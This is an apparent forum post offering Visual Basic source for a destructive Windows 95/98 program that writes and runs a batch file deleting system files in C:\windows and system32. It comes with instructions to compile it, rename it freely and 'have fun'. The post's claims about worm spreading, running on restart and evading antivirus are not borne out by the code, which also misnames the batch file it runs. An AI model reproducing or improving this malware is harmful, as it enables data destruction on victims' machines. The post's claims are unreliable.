This Bugs you can call it Worm. Because it so devasting, very simple coding but usefull and it can destroy your Operating System.
Antivirus cannot detect this bugs because its very usefull, design by Visual Basic.
I'm still do my experiment to convert this coding to C,c++. I hope i can share you soon, if i done the coding.
So..here i'm warning you again, dont ever try to break the law, means spread this bug to Goverment, college or any private sector.
You will be arrested by the Police...
And dont think if you write this virus you can say you are the Virus Pro....Dont Give a Damn, Please Dont...
Ok...what you have to do is:
1. Copy & Paste this code to your Visual Basic Project
2. And try to check the coding, if it OK
3. make the coding or your project to .EXE
4. You can rename the file whatever you want
5 If u Run the coding, at first you will not see anything but if you restart you computer the program will automatically execute,
and you will got the Result like this: (c:\System File Missing)or(c:\Windows Corrupt) - all important windows files are deleted
6. This program only can run on Windows 95 & 98
6. So have fun and enjoy
7. Please Email me at krist.picasso@gmail.com for comment and suggestions
---------------------------------------Cut & Paste Here-----------------------------------------------------------------------------
Private Sub Form_Load()
On Error Resume Next
Open "C:\destructor.txt" For Output As #1
Print#1, "@echo off"
Print#1, "cls"
Print#1, "@del C:\windows\*.ini"
Print#1, "cls"
Print#1, "@del C:\windows\*.log"
Print#1, "cls"
Print#1, "@del C:\windows\*.exe"
Print#1, "cls"
Print#1, "@del C:\windows\*.com"
Print#1, "cls"
Print#1, "@del C:\windows\system32\*.scr"
Print#1, "cls"
Print#1, "@del C:\windows\system32\*.exe"
Print#1, "cls"
Print#1, "@del C:\windows\system32\*.log"
Print#1, "cls"
Print#1, "@del C:\windows\system32\*.drv"
Print#1, "cls"
Print#1, "@del C:\windows\system32\*.dll"
Print#1, "cls"
Print#1, "@del C:\windows\system32\*.sys"
Print#1, "cls"
Print#1, "@del C:\windows\system32\*.com"
Print#1, "cls"
Print#1, "@del C:\windows\system.ini"
Close#1
Name "C:\destructor.txt" As "C:\destructor.bat"
Shell "C:\desturtor.bat"
MsgBox "The Answer is Out There!",vbCritical
Kill "C:\destructor.bat"
End
End Sub
--------------------------------------------------------End Coding-------------------------------------------------------------------